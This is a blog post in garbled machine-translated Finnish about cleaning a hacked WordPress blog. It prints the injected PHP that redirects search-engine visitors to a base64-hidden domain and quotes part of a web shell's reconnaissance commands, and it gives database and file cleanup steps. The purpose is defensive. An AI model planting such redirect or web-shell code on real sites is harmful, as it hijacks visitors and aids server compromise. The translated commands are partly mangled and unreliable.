Viime kuussa, olen saanut varoituksia virus blogi Joissakin kävijää. Aluksi en välittänyt varoituksista, koska olen asentanut aika hyvä antivirus (Kaspersky AV 2009) Ja vaikka blogi pitkään, en ole koskaan saanut virusvaroitusjärjestelmän (.. huomasin jotain epäilyttävää aiemmin, että ensimmäinen virkistää katosi. Lopuksi ...).
Hitaasti alkoi näkyä suuria eroja kävijäliikenteenJälkeen liikenne on viime vuosina laskenut tasaisesti ja alkoi olla enemmän ja enemmän ihmisiä, jotka kertovat minulle, että stealthsettings.com se on virused. Eilen sain jonkun kuvakaappaus tehdään, kun antivirus tukossa käsikirjoitus alkaen stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Se oli melko vakuuttava minulle, että laitoin kaikki lähteet etsitään. Ensimmäinen ajatus, joka tuli mieleeni oli tehdä parantaa uusin versio WordPress (2.5.1), mutta ei ennen kuin olet poistanut kaikki vanhan skriptin tiedostot WordPress ja tehdä varatietokanta. Tämä menettely ei toiminut, ja minun olisi todennäköisesti pitänyt kestää kauan selvittää, missä vika oli, ellei se olisi kertonut minulle. Eugen keskusteluun kahvikupin ääressä, hän löysi linkki Google ja olisi hyvä nähdä hänet.
MyDigitalLife.info julkaisi artikkelin otsikolla: “WordPress Hakkerointi: Palauta ja korjaa Google ja hakukone tai ei evästeliikennettä uudelleenohjattu Your-Needs.info-, AnyResults.Net-, Golden-Info.net- ja muille laittomille sivustoille"Se on langanpää tarvitsin.
Kyse hyödyntää de WordPress evästeiden perusteella, Joka on mielestäni erittäin monimutkainen ja tehdään kirja. Clever riitä tekemään SQL Injection Tietokanta blogi, luoda näkymätön käyttäjä yksinkertainen rutiinitarkastus koontinäyttöön.->käyttäjät, Tarkista palvelimen hakemistojen ja tiedostojen "kirjoitettavissa" (että chmod 777), etsiä ja etsiä suorittaa tiedostoja oikeuksilla root käyttäjä tai ryhmä. En tiedä, kuka hyödyntää nimi ja katso, että on olemassa muutamia artikkeleita hänestä kirjoitettu, vaikka monet blogit ovat sairastuneet, kuten Romania. Ok ... Yritän yrittää selittää yleistyksiä noin virus.
Mikä on virus?
Aseta ensin lähde sivuja blogeja, linkkejä näkymätön kävijöitä, mutta näkyvä ja indeksointikelpoista hakukoneita, erityisesti Google. Tällä tavoin siirtää PageRank sivustoja merkitty hyökkääjä. Toiseksi lisätään toinen uudelleenohjaus koodi URL kävijät tulevat Google, Live-, Yahoo, ... tai RSS-lukija ja ei sivusto pikkuleipä. antivirus havaitsee uudelleenohjaus kuin Trojan-Clicker.HTML.
Oireet:
Massive lasku kävijäliikenteen, Varsinkin blogeja, jossa useimmat kävijät tulevat Google.
Tunnistaminen: (tässä ongelma vaikeutuu niille, jotka eivät tiedä paljoa phpmyadminista, php:stä ja linux)
LA. HUOMIO! Tee ensin varmuuskopio tietokannasta!
1. Tarkista lähdetiedostot index.php, header.php, footer.php, Blogin aihe ja katso onko koodi käyttää salausta base64 tai sisältää ”if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”muodossa:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... Tai jotain. Poista tämä koodi!
Klikkaa kuvaa ...
Yllä olevassa kuvakaappauksessa valitsin vahingossa ja " ". Koodin on pysyttävä.
2. Käyttää phpMyAdmin ja mene tietokannan taulukkoon wp_usersJos tarkistaa, jos ei ole käyttäjätunnus luotu 00:00:00 0000-00-00 (Mahdollinen sijoitus user_login kirjoittaa "WordPress”. Kirjoita muistiin tämän käyttäjän tunnus (ID-kenttä) ja poista se.
Klikkaa kuvaa ...
* Vihreä viiva tulee poistaa ja säilyttää hänen ID. Kun kyseessä on uninenOliko ID = 8 .
3. Siirry taulukon wp_usermeta, Mistä sijaitsevat ja pyyhkiä linjat ID (jos kentän USER_ID ID-arvo näkyy poistettu).
4. Taulukossa wp_option, Siirry active_plugins ja katso, mitä plugin on käytössä epäilty. Sitä voidaan käyttää kuten loppuja _old.giff, _old.pngg, _old.jpeg, _new.php.giffjne. vale-kuvalaajennusten yhdistelmät _old ja _new kanssa.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Poista tämä laajennus ja siirry sitten blogiin -> Hallintapaneeli -> Laajennukset, jossa poistat käytöstä ja aktivoit kaikki laajennukset.
Klikkaa kuvaa nähdäksesi se näyttää active_plugins virus tiedosto.
Seuraa polku FTP-tai SSH, ilmoitetaan active_plugins ja poistaa tiedoston palvelimelta.
5. Kaikki phpMyAdmin, taulukossa wp_option, Etsi ja poista rivi, joka sisältää "rss_f541b3abd05e7962fcab37737f40fad8"Ja joukossa"internal_links_cache ".
Vuonna internal_links_cache tehdään salattu roskapostin linkkejä, jotka näkyvät blogissa ja koodi Google Adsnape, Hakkeri.
6. Suositeltava on Salasanan vaihtaminen Blogi ja login poistaa kaikki epäilyttävät userele. Päivitä uusimpaan versioon WordPress ja aseta blogi lopettamaan uusien käyttäjien rekisteröinti. Ei ole menetystä… he voivat kommentoida myös asumattomina.
Yritin edellä selittää hieman, mitä tehdä tällaisessa tilanteessa, puhdistaaksesi blogin tästä viruksesta. Ongelma on paljon vakavampi kuin miltä se näyttää, eikä sitä ole melkein ratkaistu, koska niitä käytetään haavoittuvuudet palvelimelle hosting, joka on blogi.
Koska ensimmäinen tietoturvaa, pääsy SSH, Tee joitakin tarkastuksia palvelimelle, onko mitään tiedostoja, kuten * _old * ja * _new. * Kun loppuja.giff,. jpeg,. pngg,. jpgg. Nämä tiedostot on poistettava. Jos nimeät tiedoston, esimerkiksi. top_right_old.giff in top_right_old.phpNäemme, että tiedosto on täsmälleen hyväksikäyttökoodi palvelimelle.
Hyödyllisiä ohjeita palvelimen tarkistamiseen, puhdistamiseen ja suojaamiseen. (SSH: n kautta)
1. cd / tmp ja tarkista, onko kansioita, kuten tmpVFlma tai muita yhdistelmiä on sama nimi ja poista se. Katso kuvakaappaus alla, kaksi tällaista kansiot minulta:
rm-rf kansion_nimi
2. Tarkista ja poista (muuta chmod-ul) mahdollisuuksien mukaan kansiot määritteillä chmod 777
etsi kaikki kirjoitettavat tiedostot nykyisestä kansiosta: Etsi. -Type F-permanentti-2-ls
löytää kaikki hakemistojen nykyisessä dir: Etsi. -Tyyppi d-permanentti-2-ls
etsi kaikki kirjoitettavat hakemistot ja tiedostot nykyisestä hakemistosta: Etsi. -Perm-2-ls
3. Etsitkö epäilyttäviä tiedostoja palvelimelle.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, HUOMIO! tiedostoja, jotka oli asetettu hieman SUID si SGID. Nämä tiedostot suorittaa kanssa käyttäjän oikeuksilla (ryhmä) tai root, ei käyttäjä, joka suorittaa tiedoston. Nämä tiedostot voivat johtaa root kompromissi, jos turvallisuuskysymykset. Jos käytät tiedostoja SUID ja SGID bittiä, suorittaa "chmod 0 " tai poistaa paketin, joka sisältää niitä.
Exploit sisältää jossain lähde ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Tällä tavoin ... pohjimmiltaan toteaa tietoturvarikkomuksista. Portit auki hakemistoja "kirjoitettavissa" ja ryhmä toteutus etuoikeudet tiedostoja / root.
Takaisin enemmän ...
Jotkut blogit tartunnan: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Lista jatkuu ... paljon.
Voit tarkistaa, onko blogi saanut tartunnan Google-hakukoneella. kopioi liitä:
site www.blegoo.com ostaa
Hyvää yötä ja hyvää työtä;) Pian luulen Eugenin tulevan uutisten kanssa ennakoitavissa olevalla ennakoimattomalla.fi-sivustolla.
BRB :)
HUOMIO! Teeman vaihtaminen WordPress tai päivitä siihen WordPress 2.5.1, EI ole ratkaisu päästä eroon tästä viruksesta.
